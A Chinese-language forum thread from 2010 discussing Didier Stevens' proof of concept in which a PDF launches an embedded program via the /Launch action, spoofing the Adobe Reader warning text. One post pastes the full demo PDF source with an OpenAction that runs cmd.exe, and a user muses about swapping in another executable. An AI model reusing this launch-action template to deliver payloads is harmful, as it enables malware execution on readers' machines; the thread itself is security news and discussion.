论坛 › 业界资讯 › 不通过漏洞也可利用PDF执行恶意程序

wayne 发表于 2010-4-1 15:30:48

不通过漏洞也可利用PDF执行恶意程序

安全研究人员Didier Stevens在本周发表一概念性验证程序，展示如何通过Adobe Reader的功能，而不必透过任何安全漏洞，就可在PDF文件中嵌入可执行程序。
Stevens所设计的PDF档案夹带了一个可执行程序，一旦使用者开启该PDF文件，就会启动所嵌入的可执行程序，虽然Adobe Reader会跳出一个警告窗口，提醒用户此一程序可能是恶意软件，但Stevens进一步发现他能够修改警告窗口内的档案描述文字，因此更可藉由社会工程学以欺诈用户允许该文件的执行。

Stevens强调，他所利用的并不是Adobe Reader的安全漏洞，而是由PDF语言的规格衍生而来。


对于Stevens的发现，F-Secure的首席执行官Mikko Hypponen表示，PDF文件格式的规格显示PDF允许用户嵌入各式内容，包括影片、声音、3D对象，亦可启动应用程序及JavaScript。Hypponen质疑用户为什么需要这些功能，并揶揄PDF有这么多规格难怪启动Adobe Reader或加载所有插件需要一点时间，而且不意外的，Adobe Reader会定期出现安全问题。


Stevens说，唯一可阻止程序执行的是Adobe Reader跳出的警告窗口，另一PDF阅读工具Foxit Reader也受到影响，但因该装置完全不会警告用户就径自执行程序，因此问题更为严重。


Hypponen则建议用户不要把网络上的PDF文件下载到个人计算机上，而是透过Google Docs等云端服务开启，另外也提醒使用者可以采用较冷门的PDF阅读工具以避免招惹黑客攻击。

来源：http://www.cnbeta.com/articles/107639.htm

wayne 发表于 2010-4-1 16:17:04

哈哈，我用的是pdf-Xchange，很强大，但非主流，谁要是感兴趣，可以用Adobe打开这个zip里面的 pdf体验一下：
http://didierstevens.com/files/data/launch-action-cmd.zip


参考资源：
http://software.solidot.org/article.pl?sid=10/04/01/0043252

好地方 发表于 2010-4-1 17:37:11

4月1日吧?

wayne 发表于 2010-4-2 09:14:31

我怨啊，:M:

qianyb 发表于 2010-4-2 09:55:48

我开始也以为是真的，过来想想4.1才保留怀疑意见的

gxqcn 发表于 2010-4-2 10:08:41

我怨啊，:M:
wayne 发表于 2010-4-2 09:14 http://bbs.emath.ac.cn/images/common/back.gif

是怨？还是冤？

qianyb 发表于 2010-4-2 10:10:16

应该都有吧，呵呵

wayne 发表于 2010-4-2 10:42:45

这信息是真的，
我是既冤又怨啊

IE，Adobe reader ，Adobe flash，是非常 有名的漏洞王。

这是那个zip文件里的pdf的源码，你用文本阅读器就可以打开，内容如下：
%PDF-1.1

1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj

2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj

3 0 obj
<<
/Type /Pages
/Kids
/Count 1
>>
endobj

4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
>>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

6 0 obj

endobj

7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (cmd.exe)
>>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF

gxqcn 发表于 2010-4-2 10:52:14

用 ADOBE READER 9.3.1 打开，弹出如下对话框：

wayne 发表于 2010-4-2 10:55:29

这个只是演示程序。

试想，如果我把8楼源码里的71行改成其他的可执行文件，那会是什么情况呢？

查看完整版本: 不通过漏洞也可利用PDF执行恶意程序